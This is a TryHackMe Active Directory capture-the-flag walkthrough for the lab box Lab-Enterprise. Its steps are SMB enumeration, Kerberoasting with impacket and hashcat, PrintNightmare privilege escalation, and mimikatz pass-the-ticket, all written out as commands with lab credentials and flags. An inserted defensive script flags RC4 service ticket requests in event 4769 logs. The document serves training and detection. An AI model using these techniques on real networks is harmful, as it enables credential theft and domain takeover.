This is another TryHackMe Active Directory challenge.

Enumeration:

nmap -Pn -sV -sC 10.10.238.196

Domain: Enterprise.thm
Computer Name: Lab-Enterprise

Enumeration of SMB shares.

smbclient -L //10.10.238.196/

Connecting to the “Users” share.

smbclient //10.10.238.196/Users

Spoiler, I didn’t want to go through the whole Git process because I only wanted to practice the AD stuff, so below are the creds.

nik:ToastyBoi!

Requesting service tickets for accounts with an SPN

impacket-GetUserSPNs -dc-ip 10.10.20.192 lab.enterprise.thm/nik:ToastyBoi! -request

Using Hashcat to crack the hash.

hashcat -m 13100 hash_spn.txt /usr/share/wordlists/rockyou.txt

Credentials:
bitbucket:littleredbucket
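
From the defender's side, the service ticket request above is recorded on the domain controller as Security event 4769. The following is an added example, not part of the original writeup: it flags RC4 (etype 23, the ticket type hashcat mode 13100 works on) requests for user-account services in a constructed CSV export. The column names follow the 4769 event fields; the sample rows, times and addresses are made up.

```python
import csv
import io
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23: the TGS-REP type hashcat mode 13100 targets

# Constructed sample of event 4769 rows exported as CSV (not real log data).
SAMPLE_4769 = """\
TimeCreated,TargetUserName,ServiceName,TicketEncryptionType,IpAddress
2024-01-01T10:00:01,nik@LAB.ENTERPRISE.THM,LAB-ENTERPRISE$,0x12,::ffff:10.10.0.5
2024-01-01T10:00:02,nik@LAB.ENTERPRISE.THM,krbtgt,0x12,::ffff:10.10.0.5
2024-01-01T10:03:40,nik@LAB.ENTERPRISE.THM,bitbucket,0x17,::ffff:10.10.0.99
2024-01-01T10:04:10,nik@LAB.ENTERPRISE.THM,bitbucket,0xFFFFFFFF,::ffff:10.10.0.99
2024-01-01T10:05:12,bitbucket@LAB.ENTERPRISE.THM,LAB-ENTERPRISE$,0x12,::ffff:10.10.0.5
"""


def find_kerberoast_candidates(csv_text):
    """Map each requesting account to the user-account services it
    requested with RC4 encryption."""
    hits = defaultdict(set)
    for row in csv.DictReader(io.StringIO(csv_text)):
        service = (row.get("ServiceName") or "").strip()
        requester = (row.get("TargetUserName") or "").strip()
        # Machine accounts ($) and krbtgt use long random keys, so tickets
        # for them are not useful for offline password guessing.
        if not service or service.endswith("$") or service.lower() == "krbtgt":
            continue
        try:
            etype = int(row.get("TicketEncryptionType") or "", 16)
        except ValueError:
            continue  # malformed row: skip rather than guess
        # Failed requests carry 0xFFFFFFFF and fall through here.
        if etype == RC4_HMAC:
            hits[requester].add(service)
    return {user: sorted(services) for user, services in hits.items()}


if __name__ == "__main__":
    for user, services in find_kerberoast_candidates(SAMPLE_4769).items():
        print(f"{user} requested RC4 tickets for: {', '.join(services)}")
```

Setting the service account to AES-only encryption types and giving it a long random password removes both the RC4 ticket and the wordlist hit shown here.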

RDP access using lab.enterprise.thm/bitbucket

User: THM{ed882d0}

Privilege Escalation

Using PrintNightmare to escalate privileges by creating a new local administrator account

adm1n:P@ssw0rd

RDP access using adm1n account.

Copied mimikatz and dumped all account hashes, which then allowed me to pass the ticket of the administrator.

sekurlsa::tickets /export

Selected the Administrator account ticket.

kerberos::ptt [0;5a168]-2-0-40e10000-Administrator@krbtgt-LAB.ENTERPRISE.THM.kirbi

Opened a new command prompt which allowed us to access the entire box.

misc::cmd

root: THM{1a1fa}